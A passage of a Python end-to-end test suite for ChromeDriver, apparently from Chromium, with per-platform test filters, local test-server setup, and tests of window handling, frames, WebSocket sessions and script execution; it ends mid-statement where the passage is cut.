#!/usr/bin/env python # Copyright 2013 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """End to end tests for ChromeDriver.""" # Note that to run Android tests you must have the following line in # .gclient (in the parent directory of src): target_os = [ 'android' ] # to get the appropriate adb version for ChromeDriver. # TODO (crbug.com/857239): Remove above comment when adb version # is updated in Devil. import base64 import json import math import optparse import os import re import shutil import socket import subprocess import sys import tempfile import threading import time import unittest import urllib import urllib2 import uuid import imghdr import struct _THIS_DIR = os.path.abspath(os.path.dirname(__file__)) _PARENT_DIR = os.path.join(_THIS_DIR, os.pardir) _CLIENT_DIR = os.path.join(_PARENT_DIR, "client") _SERVER_DIR = os.path.join(_PARENT_DIR, "server") _TEST_DIR = os.path.join(_PARENT_DIR, "test") sys.path.insert(1, _PARENT_DIR) import chrome_paths import util sys.path.remove(_PARENT_DIR) sys.path.insert(1, _CLIENT_DIR) import chromedriver import websocket_connection import webelement sys.path.remove(_CLIENT_DIR) sys.path.insert(1, _SERVER_DIR) import server sys.path.remove(_SERVER_DIR) sys.path.insert(1, _TEST_DIR) import unittest_util import webserver sys.path.remove(_TEST_DIR) sys.path.insert(0,os.path.join(chrome_paths.GetSrc(), 'third_party', 'catapult', 'third_party', 'gsutil', 'third_party', 'monotonic')) from monotonic import monotonic _TEST_DATA_DIR = os.path.join(chrome_paths.GetTestData(), 'chromedriver') if util.IsLinux(): sys.path.insert(0, os.path.join(chrome_paths.GetSrc(), 'third_party', 'catapult', 'devil')) from devil.android import device_utils from devil.android import forwarder sys.path.insert(0, os.path.join(chrome_paths.GetSrc(), 'build', 'android')) import devil_chromium from pylib import constants _NEGATIVE_FILTER = [ # This test is 
too flaky on the bots, but seems to run perfectly fine # on developer workstations. 'ChromeDriverTest.testEmulateNetworkConditionsNameSpeed', 'ChromeDriverTest.testEmulateNetworkConditionsSpeed', # https://bugs.chromium.org/p/chromedriver/issues/detail?id=833 'ChromeDriverTest.testAlertOnNewWindow', # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2532 'ChromeDriverPageLoadTimeoutTest.testRefreshWithPageLoadTimeout', # https://bugs.chromium.org/p/chromedriver/issues/detail?id=3517 'ChromeDriverTest.testPrint', 'ChromeDriverTest.testPrintInvalidArgument', ] _OS_SPECIFIC_FILTER = {} _OS_SPECIFIC_FILTER['win'] = [ # https://bugs.chromium.org/p/chromedriver/issues/detail?id=299 'ChromeLogPathCapabilityTest.testChromeLogPath', ] _OS_SPECIFIC_FILTER['linux'] = [ ] _OS_SPECIFIC_FILTER['mac'] = [ # https://bugs.chromium.org/p/chromedriver/issues/detail?id=1927 # https://crbug.com/1036636 'MobileEmulationCapabilityTest.testTapElement', # https://bugs.chromium.org/p/chromium/issues/detail?id=1011225 'ChromeDriverTest.testActionsMultiTouchPoint', # Flaky: https://crbug.com/1156576. 'ChromeDriverTestLegacy.testContextMenuEventFired', # Flaky: https://crbug.com/1157533. 'ChromeDriverTest.testShadowDomFindElement', ] _DESKTOP_NEGATIVE_FILTER = [ # Desktop doesn't support touch (without --touch-events). 'ChromeDriverTestLegacy.testTouchSingleTapElement', 'ChromeDriverTest.testTouchDownMoveUpElement', 'ChromeDriverTestLegacy.testTouchScrollElement', 'ChromeDriverTestLegacy.testTouchDoubleTapElement', 'ChromeDriverTestLegacy.testTouchLongPressElement', 'ChromeDriverTest.testTouchFlickElement', 'ChromeDriverAndroidTest.*', ] _INTEGRATION_NEGATIVE_FILTER = [ # The following test is flaky on Windows and Mac. 'ChromeDownloadDirTest.testDownloadDirectoryOverridesExistingPreferences', # ChromeDriverLogTest tests an internal ChromeDriver feature, not needed # for integration test. 'ChromeDriverLogTest.*', # ChromeDriverPageLoadTimeoutTest is flaky, particularly on Mac. 
    'ChromeDriverPageLoadTimeoutTest.*',
    # Some trivial test cases that provide no additional value beyond what are
    # already tested by other test cases.
    'ChromeDriverTest.testGetCurrentWindowHandle',
    'ChromeDriverTest.testStartStop',
    # PerfTest takes a long time, requires extra setup, and adds little value
    # to integration testing.
    'PerfTest.*',
    # Flaky: https://crbug.com/899919
    'SessionHandlingTest.testGetSessions',
    # Flaky due to occasional timeout in starting Chrome
    'ZChromeStartRetryCountTest.testChromeStartRetryCount',
]


def _GetDesktopNegativeFilter():
  """Return the negative test filter for desktop runs on this platform."""
  # NOTE(review): the locals below shadow the builtin `filter` and the
  # imported `os` module (harmless inside this function, but worth renaming).
  filter = _NEGATIVE_FILTER + _DESKTOP_NEGATIVE_FILTER
  os = util.GetPlatformName()
  if os in _OS_SPECIFIC_FILTER:
    filter += _OS_SPECIFIC_FILTER[os]
  return filter

# Per-package negative filters for Android; keyed by the package key passed
# on the command line. Each entry extends the base _NEGATIVE_FILTER.
_ANDROID_NEGATIVE_FILTER = {}
_ANDROID_NEGATIVE_FILTER['chrome'] = (
    _NEGATIVE_FILTER + [
        # Android doesn't support switches and extensions.
        'ChromeSwitchesCapabilityTest.*',
        'ChromeExtensionsCapabilityTest.*',
        'MobileEmulationCapabilityTest.*',
        'ChromeDownloadDirTest.*',
        # https://crbug.com/274650
        'ChromeDriverTest.testCloseWindow',
        # Most window operations don't make sense on Android.
        'ChromeDriverTest.testWindowFullScreen',
        'ChromeDriverTest.testWindowPosition',
        'ChromeDriverTest.testWindowSize',
        'ChromeDriverTest.testWindowRect',
        'ChromeDriverTest.testWindowMaximize',
        'ChromeDriverTest.testWindowMinimize',
        'ChromeLogPathCapabilityTest.testChromeLogPath',
        # Connecting to running browser is not supported on Android.
        'RemoteBrowserTest.*',
        # Don't enable perf testing on Android yet.
        'PerfTest.*',
        # Android doesn't support multiple sessions on one device.
        'SessionHandlingTest.testGetSessions',
        # Android doesn't use the chrome://print dialog.
        'ChromeDriverTest.testCanSwitchToPrintPreviewDialog',
        # Chrome 44+ for Android doesn't dispatch the dblclick event
        'ChromeDriverTest.testMouseDoubleClick',
        # Page cannot be loaded from file:// URI in Android unless it
        # is stored in device.
        'ChromeDriverTest.testCanClickAlertInIframes',
        # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2081
        'ChromeDriverTest.testCloseWindowUsingJavascript',
        # Android doesn't support headless mode
        'HeadlessInvalidCertificateTest.*',
        'HeadlessChromeDriverTest.*',
        # Tests of the desktop Chrome launch process.
        'LaunchDesktopTest.*',
        # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2737
        'ChromeDriverTest.testTakeElementScreenshot',
        'ChromeDriverTest.testTakeElementScreenshotInIframe',
        # setWindowBounds not supported on Android
        'ChromeDriverTest.testTakeLargeElementScreenshot',
        # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2786
        'ChromeDriverTest.testActionsTouchTap',
        'ChromeDriverTest.testTouchDownMoveUpElement',
        'ChromeDriverTest.testTouchFlickElement',
        # Android has no concept of tab or window, and will always lose focus
        # on tab creation. https://crbug.com/chromedriver/3018
        'ChromeDriverTest.testNewWindowDoesNotFocus',
        'ChromeDriverTest.testNewTabDoesNotFocus',
        # Android does not support the virtual authenticator environment.
        'ChromeDriverSecureContextTest.*',
        # Covered by Desktop tests; can't create 2 browsers in Android
        'SupportIPv4AndIPv6.testSupportIPv4AndIPv6',
        # Browser context management is not supported by Android
        'ChromeDriverTest.testClipboardPermissions',
        'ChromeDriverTest.testMidiPermissions',
        'ChromeDriverTest.testMultiplePermissions',
        'ChromeDriverTest.testNewWindowSameDomainHasSamePermissions',
        'ChromeDriverTest.testPermissionStates',
        'ChromeDriverTest.testPermissionsOpaqueOriginsThrowError',
        'ChromeDriverTest.testPermissionsSameOrigin',
        'ChromeDriverTest.testPermissionsSameOriginDoesNotAffectOthers',
        'ChromeDriverTest.testPersistentStoragePermissions',
        'ChromeDriverTest.testPushAndNotificationsPermissions',
        'ChromeDriverTest.testSensorPermissions',
        'ChromeDriverTest.testSettingPermissionDoesNotAffectOthers',
        # Android does not allow changing window size
        'JavaScriptTests.*',
        # These tests are failing on Android
        # https://bugs.chromium.org/p/chromedriver/issues/detail?id=3560
        'ChromeDriverTest.testTakeLargeElementViewportScreenshot',
        'ChromeDriverTest.testTakeLargeElementFullPageScreenshot'
    ]
)
_ANDROID_NEGATIVE_FILTER['chrome_stable'] = (
    _ANDROID_NEGATIVE_FILTER['chrome'] + [
        # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2350
        'ChromeDriverTest.testSlowIFrame',
        # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2503
        'ChromeDriverTest.testGetLogOnClosedWindow',
        'ChromeDriverTest.testGetWindowHandles',
        'ChromeDriverTest.testShouldHandleNewWindowLoadingProperly',
        'ChromeDriverTest.testSwitchToWindow',
        # Feature not yet supported in this version
        'ChromeDriverTest.testGenerateTestReport',
    ]
)
_ANDROID_NEGATIVE_FILTER['chrome_beta'] = (
    _ANDROID_NEGATIVE_FILTER['chrome'] + [
        # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2503
        'ChromeDriverTest.testGetLogOnClosedWindow',
        'ChromeDriverTest.testGetWindowHandles',
        'ChromeDriverTest.testShouldHandleNewWindowLoadingProperly',
        'ChromeDriverTest.testSwitchToWindow',
        # Feature not yet supported in this version
        'ChromeDriverTest.testGenerateTestReport',
    ]
)
_ANDROID_NEGATIVE_FILTER['chromium'] = (
    _ANDROID_NEGATIVE_FILTER['chrome'] + []
)
_ANDROID_NEGATIVE_FILTER['chromedriver_webview_shell'] = (
    _ANDROID_NEGATIVE_FILTER['chrome_stable'] + [
        # WebView doesn't support emulating network conditions.
        'ChromeDriverTest.testEmulateNetworkConditions',
        'ChromeDriverTest.testEmulateNetworkConditionsNameSpeed',
        'ChromeDriverTest.testEmulateNetworkConditionsOffline',
        'ChromeDriverTest.testEmulateNetworkConditionsSpeed',
        'ChromeDriverTest.testEmulateNetworkConditionsName',
        # WebView shell doesn't support popups or popup blocking.
        'ChromeDriverTest.testPopups',
        'ChromeDriverTest.testDontGoBackOrGoForward',
        # ChromeDriver WebView shell doesn't support multiple tabs.
        'ChromeDriverTest.testCloseWindowUsingJavascript',
        'ChromeDriverTest.testGetWindowHandles',
        'ChromeDriverTest.testSwitchToWindow',
        'ChromeDriverTest.testShouldHandleNewWindowLoadingProperly',
        'ChromeDriverTest.testGetLogOnClosedWindow',
        # The WebView shell that we test against (on KitKat) does not perform
        # cross-process navigations.
        # TODO(samuong): reenable when it does.
        'ChromeDriverPageLoadTimeoutTest.testPageLoadTimeoutCrossDomain',
        'ChromeDriverPageLoadTimeoutTest.'
            'testHistoryNavigationWithPageLoadTimeout',
        # Webview shell doesn't support Alerts.
'ChromeDriverTest.testAlert', 'ChromeDriverTest.testAlertOnNewWindow', 'ChromeDesiredCapabilityTest.testUnexpectedAlertBehaviour', 'ChromeDriverTest.testAlertHandlingOnPageUnload', 'ChromeDriverTest.testClickElementAfterNavigation', 'ChromeDriverTest.testGetLogOnWindowWithAlert', 'ChromeDriverTest.testSendTextToAlert', 'ChromeDriverTest.testUnexpectedAlertOpenExceptionMessage', # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2332 'ChromeDriverTestLegacy.testTouchScrollElement', ] ) class ChromeDriverBaseTest(unittest.TestCase): """Base class for testing chromedriver functionalities.""" def __init__(self, *args, **kwargs): super(ChromeDriverBaseTest, self).__init__(*args, **kwargs) self._drivers = [] def tearDown(self): for driver in self._drivers: try: driver.Quit() except: pass def CreateDriver(self, server_url=None, server_pid=None, download_dir=None, **kwargs): if server_url is None: server_url = _CHROMEDRIVER_SERVER_URL if server_pid is None: server_pid = _CHROMEDRIVER_SERVER_PID if (not _ANDROID_PACKAGE_KEY and 'debugger_address' not in kwargs and '_MINIDUMP_PATH' in globals() and _MINIDUMP_PATH): # Environment required for minidump not supported on Android # minidumpPath will fail parsing if debugger_address is set if 'experimental_options' in kwargs: if 'minidumpPath' not in kwargs['experimental_options']: kwargs['experimental_options']['minidumpPath'] = _MINIDUMP_PATH else: kwargs['experimental_options'] = {'minidumpPath': _MINIDUMP_PATH} android_package = None android_activity = None android_process = None if _ANDROID_PACKAGE_KEY: android_package = constants.PACKAGE_INFO[_ANDROID_PACKAGE_KEY].package if _ANDROID_PACKAGE_KEY == 'chromedriver_webview_shell': android_activity = constants.PACKAGE_INFO[_ANDROID_PACKAGE_KEY].activity android_process = '%s:main' % android_package driver = chromedriver.ChromeDriver(server_url, server_pid, chrome_binary=_CHROME_BINARY, android_package=android_package, android_activity=android_activity, 
                                       android_process=android_process,
                                       download_dir=download_dir,
                                       test_name=self.id(),
                                       **kwargs)
    # Track the driver so tearDown can quit it.
    self._drivers += [driver]
    return driver

  def WaitForNewWindow(self, driver, old_handles, check_closed_windows=True):
    """Wait for at least one new window to show up in 20 seconds.

    Args:
      old_handles: Handles to all old windows before the new window is added.
      check_closed_windows: If True, assert that no windows are closed before
          the new window is added.

    Returns:
      Handle to a new window. None if timeout.
    """
    deadline = monotonic() + 20
    while monotonic() < deadline:
      handles = driver.GetWindowHandles()
      if check_closed_windows:
        self.assertTrue(set(old_handles).issubset(handles))
      new_handles = set(handles).difference(set(old_handles))
      if len(new_handles) > 0:
        # Return an arbitrary new handle (there is usually exactly one).
        return new_handles.pop()
      time.sleep(0.01)
    return None

  def WaitForCondition(self, predicate, timeout=5, timestep=0.1):
    """Wait for a condition to become true.

    Args:
      predicate: A function that returns a boolean value.

    Returns:
      True as soon as the predicate holds; False if the timeout elapses.
    """
    deadline = monotonic() + timeout
    while monotonic() < deadline:
      if predicate():
        return True
      time.sleep(timestep)
    return False


class ChromeDriverBaseTestWithWebServer(ChromeDriverBaseTest):
  """Base class that also starts HTTP/HTTPS/sync test web servers."""

  @staticmethod
  def GlobalSetUp():
    # Shared servers for all tests; shut down in GlobalTearDown.
    ChromeDriverBaseTestWithWebServer._http_server = webserver.WebServer(
        chrome_paths.GetTestData())
    ChromeDriverBaseTestWithWebServer._sync_server = webserver.SyncWebServer()
    cert_path = os.path.join(chrome_paths.GetTestData(),
                             'chromedriver/invalid_ssl_cert.pem')
    ChromeDriverBaseTestWithWebServer._https_server = webserver.WebServer(
        chrome_paths.GetTestData(), cert_path)

    def respondWithUserAgentString(request):
      return {}, """
        <html>
        <body>%s</body>
        </html>""" % request.GetHeader('User-Agent')

    def respondWithUserAgentStringUseDeviceWidth(request):
      return {}, """
        <html>
        <head>
        <meta name="viewport" content="width=device-width,minimum-scale=1.0">
        </head>
        <body>%s</body>
        </html>""" % request.GetHeader('User-Agent')

    ChromeDriverBaseTestWithWebServer._http_server.SetCallbackForPath(
        '/userAgent',
        respondWithUserAgentString)
    ChromeDriverBaseTestWithWebServer._http_server.SetCallbackForPath(
        '/userAgentUseDeviceWidth', respondWithUserAgentStringUseDeviceWidth)

    if _ANDROID_PACKAGE_KEY:
      # Forward the test server ports to the attached Android device.
      ChromeDriverBaseTestWithWebServer._device = (
          device_utils.DeviceUtils.HealthyDevices()[0])
      http_host_port = (
          ChromeDriverBaseTestWithWebServer._http_server._server.server_port)
      sync_host_port = (
          ChromeDriverBaseTestWithWebServer._sync_server._server.server_port)
      https_host_port = (
          ChromeDriverBaseTestWithWebServer._https_server._server.server_port)
      forwarder.Forwarder.Map(
          [(http_host_port, http_host_port),
           (sync_host_port, sync_host_port),
           (https_host_port, https_host_port)],
          ChromeDriverBaseTestWithWebServer._device)

  @staticmethod
  def GlobalTearDown():
    if _ANDROID_PACKAGE_KEY:
      # NOTE(review): this reads _device via the ChromeDriverTest subclass
      # rather than ChromeDriverBaseTestWithWebServer where it is set; the
      # lookup resolves to the same attribute but is fragile -- confirm and
      # consider unifying.
      forwarder.Forwarder.UnmapAllDevicePorts(ChromeDriverTest._device)
    ChromeDriverBaseTestWithWebServer._http_server.Shutdown()
    ChromeDriverBaseTestWithWebServer._https_server.Shutdown()

  @staticmethod
  def GetHttpUrlForFile(file_path):
    return ChromeDriverBaseTestWithWebServer._http_server.GetUrl() + file_path


class ChromeDriverTestWithCustomCapability(ChromeDriverBaseTestWithWebServer):
  """Tests exercising non-default session capabilities."""

  def testEagerMode(self):
    send_response = threading.Event()
    def waitAndRespond():
      # Hold the image response back so a "normal" load would block.
      send_response.wait(10)
      self._sync_server.RespondWithContent('#')
    thread = threading.Thread(target=waitAndRespond)
    self._http_server.SetDataForPath('/top.html',
        """
        <html><body>
        <div id='top'>
        <img src='%s'>
        </div>
        </body></html>""" % self._sync_server.GetUrl())
    eager_driver = self.CreateDriver(page_load_strategy='eager')
    thread.start()
    start_eager = monotonic()
    eager_driver.Load(self._http_server.GetUrl() + '/top.html')
    stop_eager = monotonic()
    send_response.set()
    eager_time = stop_eager - start_eager
    # Eager loads must not wait for the (delayed) subresource.
    self.assertTrue(eager_time < 9)
    thread.join()

  def testDoesntWaitWhenPageLoadStrategyIsNone(self):
    class HandleRequest(object):
      def __init__(self):
        self.sent_hello = threading.Event()

      def slowPage(self, request):
        self.sent_hello.wait(2)
        return {}, """
        <html>
        <body>hello</body>
        </html>"""

    handler = HandleRequest()
    self._http_server.SetCallbackForPath('/slow', handler.slowPage)

    driver = self.CreateDriver(page_load_strategy='none')
    self.assertEquals('none', driver.capabilities['pageLoadStrategy'])

    driver.Load(self._http_server.GetUrl() + '/chromedriver/empty.html')
    start = monotonic()
    driver.Load(self._http_server.GetUrl() + '/slow')
    # With strategy 'none', Load returns before the slow page responds.
    self.assertTrue(monotonic() - start < 2)
    handler.sent_hello.set()
    self.WaitForCondition(lambda: 'hello' in driver.GetPageSource())
    self.assertTrue('hello' in driver.GetPageSource())

  def testUnsupportedPageLoadStrategyRaisesException(self):
    self.assertRaises(chromedriver.InvalidArgument,
                      self.CreateDriver,
                      page_load_strategy="unsupported")

  def testGetUrlOnInvalidUrl(self):
    # Make sure we don't return 'chrome-error://chromewebdata/' (see
    # https://bugs.chromium.org/p/chromedriver/issues/detail?id=1272).
    # Block DNS resolution for all hosts so that the navigation results
    # in a DNS lookup error.
    driver = self.CreateDriver(
        chrome_switches=['--host-resolver-rules=MAP * ~NOTFOUND'])
    self.assertRaises(chromedriver.ChromeDriverException,
                      driver.Load,
                      'http://invalid/')
    self.assertEquals('http://invalid/', driver.GetCurrentUrl())


class ChromeDriverWebSocketTest(ChromeDriverBaseTestWithWebServer):
  """Tests for the W3C BiDi webSocketUrl capability and connections."""

  @staticmethod
  def composeWebSocketUrl(server_url, session_id):
    # ws://<server>/session/<id> mirrors the HTTP endpoint.
    return server_url.replace('http', 'ws') + '/session/' + session_id

  def testDefaultSession(self):
    driver = self.CreateDriver()
    self.assertFalse(driver.capabilities.has_key('webSocketUrl'))
    self.assertRaises(Exception,
                      websocket_connection.WebSocketConnection,
                      _CHROMEDRIVER_SERVER_URL, driver.GetSessionId())

  def testWebSocketUrlFalse(self):
    driver = self.CreateDriver(web_socket_url=False)
    self.assertFalse(driver.capabilities.has_key('webSocketUrl'))
    self.assertRaises(Exception,
                      websocket_connection.WebSocketConnection,
                      _CHROMEDRIVER_SERVER_URL, driver.GetSessionId())

  def testWebSocketUrlTrue(self):
    driver = self.CreateDriver(web_socket_url=True)
    self.assertTrue(driver.capabilities.has_key('webSocketUrl'))
    self.assertNotEqual(None, driver.GetSessionId())
    self.assertEquals(driver.capabilities['webSocketUrl'],
                      self.composeWebSocketUrl(_CHROMEDRIVER_SERVER_URL,
                                               driver.GetSessionId()))
    websocket = websocket_connection.WebSocketConnection(
        _CHROMEDRIVER_SERVER_URL, driver.GetSessionId())
    self.assertNotEqual(None, websocket)

  def testWebSocketUrlInvalid(self):
    self.assertRaises(chromedriver.InvalidArgument,
                      self.CreateDriver,
                      web_socket_url='Invalid')

  def testWebSocketOneConnectionPerSession(self):
    driver = self.CreateDriver(web_socket_url=True)
    websocket = websocket_connection.WebSocketConnection(
        _CHROMEDRIVER_SERVER_URL, driver.GetSessionId())
    self.assertNotEqual(None, websocket)
    # A second concurrent connection to the same session must be rejected.
    self.assertRaises(Exception,
                      websocket_connection.WebSocketConnection,
                      _CHROMEDRIVER_SERVER_URL, driver.GetSessionId())

  def testWebSocketInvalidSessionId(self):
    driver = self.CreateDriver(web_socket_url=True)
    self.assertRaises(Exception,
                      websocket_connection.WebSocketConnection,
                      _CHROMEDRIVER_SERVER_URL, "random_session_id_123")

  def testWebSocketClosedCanReconnect(self):
    driver = self.CreateDriver(web_socket_url=True)
    websocket = websocket_connection.WebSocketConnection(
        _CHROMEDRIVER_SERVER_URL, driver.GetSessionId())
    self.assertNotEqual(None, websocket)
    websocket.Close()
    # Closing the first connection frees the slot for a new one.
    websocket2 = websocket_connection.WebSocketConnection(
        _CHROMEDRIVER_SERVER_URL, driver.GetSessionId())
    self.assertNotEqual(None, websocket2)


class ChromeDriverTest(ChromeDriverBaseTestWithWebServer):
  """End to end tests for ChromeDriver."""

  def setUp(self):
    self._driver = self.CreateDriver()

  def testStartStop(self):
    pass

  def testGetComputedAttributes(self):
    self._driver.Load(
        self.GetHttpUrlForFile('/chromedriver/accessibility.html'))
    firstHeaderElement = self._driver.FindElement(
        'css selector', '#first-header')
    self.assertEquals(firstHeaderElement.GetComputedLabel(), 'header content')
self.assertEquals(firstHeaderElement.GetComputedRole(), 'heading') def testGetComputedAttributesForIgnoredNode(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/accessibility.html')) ignoredHeaderElement = self._driver.FindElement( 'css selector', '#ignored-header') # GetComputedLabel for ignored node should return empty string. self.assertEquals(ignoredHeaderElement.GetComputedLabel(), '') self.assertEquals(ignoredHeaderElement.GetComputedRole(), 'Ignored') def testGetComputedAttributesForUnrenderedNode(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/accessibility.html')) unrenderedHeaderElement = self._driver.FindElement( 'css selector', '#unrendered-header') # GetComputedLabel for unrendered node should return empty string. self.assertEquals(unrenderedHeaderElement.GetComputedLabel(), '') self.assertEquals(unrenderedHeaderElement.GetComputedRole(), 'Ignored') def testLoadUrl(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) def testGetCurrentWindowHandle(self): self._driver.GetCurrentWindowHandle() # crbug.com/p/chromedriver/issues/detail?id=2995 exposed that some libraries # introduce circular function references. Functions should not be serialized # or treated as an object - this test checks that circular function # definitions are allowed (despite how they are not spec-compliant. 
  def testExecuteScriptWithSameFunctionReference(self):
    # The same function object is reachable through several properties of the
    # returned object; serialization must not reject or duplicate it.
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.ExecuteScript("""function copyMe() { return 1; }
        Function.prototype.foo = copyMe;
        const obj = {};
        obj['buzz'] = copyMe;
        return obj;""")

  def _newWindowDoesNotFocus(self, window_type='window'):
    # Helper: opens a new window/tab and checks the original page kept focus.
    # focus_blur_test.html writes 'PASS' into #result when no blur occurred
    # — presumably; verify against the test page if this changes.
    current_handles = self._driver.GetWindowHandles()
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/focus_blur_test.html'))
    new_window = self._driver.NewWindow(window_type=window_type)
    text = self._driver.FindElement('css selector', '#result').GetText()
    self.assertTrue(new_window['handle'] not in current_handles)
    self.assertTrue(new_window['handle'] in self._driver.GetWindowHandles())
    self.assertEquals(text, 'PASS')

  def testNewWindowDoesNotFocus(self):
    self._newWindowDoesNotFocus(window_type='window')

  def testNewTabDoesNotFocus(self):
    self._newWindowDoesNotFocus(window_type='tab')

  def testCloseWindow(self):
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
    old_handles = self._driver.GetWindowHandles()
    # Clicking #link opens a second window (see page_test.html link target).
    self._driver.FindElement('css selector', '#link').Click()
    new_window_handle = self.WaitForNewWindow(self._driver, old_handles)
    self.assertNotEqual(None, new_window_handle)
    self._driver.SwitchToWindow(new_window_handle)
    self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle())
    # The new window has no #link element, confirming the switch took effect.
    self.assertRaises(chromedriver.NoSuchElement, self._driver.FindElement,
                      'css selector', '#link')
    close_returned_handles = self._driver.CloseWindow()
    # The closed window is no longer current, so querying it must fail.
    self.assertRaises(chromedriver.NoSuchWindow,
                      self._driver.GetCurrentWindowHandle)
    new_handles = self._driver.GetWindowHandles()
    # CloseWindow returns the handles that remain open.
    self.assertEquals(close_returned_handles, new_handles)
    for old_handle in old_handles:
      self.assertTrue(old_handle in new_handles)
    for handle in new_handles:
      self._driver.SwitchToWindow(handle)
      self.assertEquals(handle, self._driver.GetCurrentWindowHandle())
      close_handles = self._driver.CloseWindow()
      # CloseWindow quits the session if on the last window.
if handle is not new_handles[-1]: from_get_window_handles = self._driver.GetWindowHandles() self.assertEquals(close_handles, from_get_window_handles) def testCloseWindowUsingJavascript(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html')) old_handles = self._driver.GetWindowHandles() self._driver.FindElement('css selector', '#link').Click() new_window_handle = self.WaitForNewWindow(self._driver, old_handles) self.assertNotEqual(None, new_window_handle) self._driver.SwitchToWindow(new_window_handle) self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle()) self.assertRaises(chromedriver.NoSuchElement, self._driver.FindElement, 'css selector', '#link') self._driver.ExecuteScript('window.close()') with self.assertRaises(chromedriver.NoSuchWindow): self._driver.GetTitle() def testGetWindowHandles(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html')) old_handles = self._driver.GetWindowHandles() self._driver.FindElement('css selector', '#link').Click() self.assertNotEqual(None, self.WaitForNewWindow(self._driver, old_handles)) def testGetWindowHandlesInPresenceOfSharedWorker(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/shared_worker.html')) old_handles = self._driver.GetWindowHandles() def testSwitchToWindow(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html')) self.assertEquals( 1, self._driver.ExecuteScript('window.name = "oldWindow"; return 1;')) window1_handle = self._driver.GetCurrentWindowHandle() old_handles = self._driver.GetWindowHandles() self._driver.FindElement('css selector', '#link').Click() new_window_handle = self.WaitForNewWindow(self._driver, old_handles) self.assertNotEqual(None, new_window_handle) self._driver.SwitchToWindow(new_window_handle) self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle()) self.assertRaises(chromedriver.NoSuchElement, self._driver.FindElement, 'css selector', '#link') 
self._driver.SwitchToWindow('oldWindow') self.assertEquals(window1_handle, self._driver.GetCurrentWindowHandle()) def testEvaluateScript(self): self.assertEquals(1, self._driver.ExecuteScript('return 1')) self.assertEquals(None, self._driver.ExecuteScript('')) def testEvaluateScriptWithArgs(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) script = ('document.body.innerHTML = "<div>b</div><div>c</div>";' 'return {stuff: document.querySelectorAll("div")};') stuff = self._driver.ExecuteScript(script)['stuff'] script = 'return arguments[0].innerHTML + arguments[1].innerHTML' self.assertEquals( 'bc', self._driver.ExecuteScript(script, stuff[0], stuff[1])) def testEvaluateInvalidScript(self): self.assertRaises(chromedriver.ChromeDriverException, self._driver.ExecuteScript, '{{{') def testExecuteAsyncScript(self): self._driver.SetTimeouts({'script': 3000}) self.assertRaises( chromedriver.ScriptTimeout, self._driver.ExecuteAsyncScript, 'var callback = arguments[0];' 'setTimeout(function(){callback(1);}, 10000);') self.assertEquals( 2, self._driver.ExecuteAsyncScript( 'var callback = arguments[0];' 'setTimeout(function(){callback(2);}, 300);')) def testExecuteScriptTimeout(self): self._driver.SetTimeouts({'script': 0}) self.assertRaises( chromedriver.ScriptTimeout, self._driver.ExecuteScript, 'return 2') # Regular script can still run afterwards. 
self._driver.SetTimeouts({'script': 1000}) self.assertEquals( 4, self._driver.ExecuteScript('return 4')) def testSwitchToFrame(self): self._driver.ExecuteScript( 'var frame = document.createElement("iframe");' 'frame.id="id";' 'frame.name="name";' 'document.body.appendChild(frame);') self.assertTrue(self._driver.ExecuteScript('return window.top == window')) self._driver.SwitchToFrame('id') self.assertTrue(self._driver.ExecuteScript('return window.top != window')) self._driver.SwitchToMainFrame() self.assertTrue(self._driver.ExecuteScript('return window.top == window')) self._driver.SwitchToFrame('name') self.assertTrue(self._driver.ExecuteScript('return window.top != window')) self._driver.SwitchToMainFrame() self.assertTrue(self._driver.ExecuteScript('return window.top == window')) self._driver.SwitchToFrameByIndex(0) self.assertTrue(self._driver.ExecuteScript('return window.top != window')) self._driver.SwitchToMainFrame() self.assertTrue(self._driver.ExecuteScript('return window.top == window')) self._driver.SwitchToFrame(self._driver.FindElement('tag name', 'iframe')) self.assertTrue(self._driver.ExecuteScript('return window.top != window')) def testSwitchToParentFrame(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/nested.html')) self.assertTrue('One' in self._driver.GetPageSource()) self._driver.SwitchToFrameByIndex(0) self.assertTrue('Two' in self._driver.GetPageSource()) self._driver.SwitchToFrameByIndex(0) self.assertTrue('Three' in self._driver.GetPageSource()) self._driver.SwitchToParentFrame() self.assertTrue('Two' in self._driver.GetPageSource()) self._driver.SwitchToParentFrame() self.assertTrue('One' in self._driver.GetPageSource()) def testSwitchToNestedFrame(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/nested_frameset.html')) self._driver.SwitchToFrameByIndex(0) self._driver.FindElement("css selector", "#link") self._driver.SwitchToMainFrame() self._driver.SwitchToFrame('2Frame') self._driver.FindElement("css 
